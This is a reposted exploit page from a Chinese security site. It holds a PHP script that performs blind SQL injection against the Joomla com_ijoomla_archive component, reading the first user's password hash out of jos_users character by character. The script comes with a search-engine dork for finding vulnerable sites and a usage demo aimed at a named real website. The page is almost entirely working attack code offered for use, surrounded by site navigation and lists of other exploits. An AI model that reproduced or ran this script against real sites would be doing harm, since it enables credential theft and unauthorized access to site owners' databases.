首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Joomla com_ijoomla_archive Blind SQL Injection Exploit 来源：www.vfcocus.net 作者：Moad 发布时间：2009-03-06   <?php /* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +       Joomla com_ijoomla_archive Blind SQL Injection Exploit       + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ AUTHOR : Mountassif Moad DATE   : 5 mars 2009 ##################################################### APPLICATION   : Joomla com_ijoomla_archive DORK          : inurl:"com_ijoomla_archive" ##################################################### */ # ini_set("max_execution_time",0); print_r(' ############################################################### # com_ijoomla_archiv Blind SQL Injection Exploit # php '.$argv[0].' http://www.site.com/ real id # Demo : # php '.$argv[0].' http://thecatholicspirit.com/ 17 #                                                         ############################################################### '); if ($argc > 1) { $url = $argv[1]; if ($argc < 3) { $userid = 1; } else { $userid = $argv[2]; } $r = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+1=1")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+1=0")); $t = abs((100-($w/$r*100))); echo "\nPassword: "; for ($j = 1; $j <= 32; $j++) {    for ($i = 46; $i <= 102; $i=$i+2) {       if ($i == 60) {          $i = 98;       }       $laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i.""));       if (abs((100-($laenge/$r*100))) > $t-1) {          $laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1).""));          if (abs((100-($laenge/$r*100))) > $t-1) {             echo chr($i-1);          } else {             echo chr($i);          }          $i = 102;       }    } } } else { echo "\nExploiting failed: find another site\n"; } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Multiple Vendors libc:fts_*() ·Internet Explorer 8 beta RC1 h ·Media Commands (m3u File) Univ ·SupportSoft DNA Editor Module ·Phortail version 1.2.1 proof o ·Media Commands .m3l File Local ·Nokia Multimedia Player 1.0 (p ·Winamp <= 5.541 Skin Universal ·Realtek Sound Manager 1.15.0.0 ·Ghostscripter Amazon Shop remo ·EO Video v1.36 PlayList SEH Ov ·Libra PHP File Manager version   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved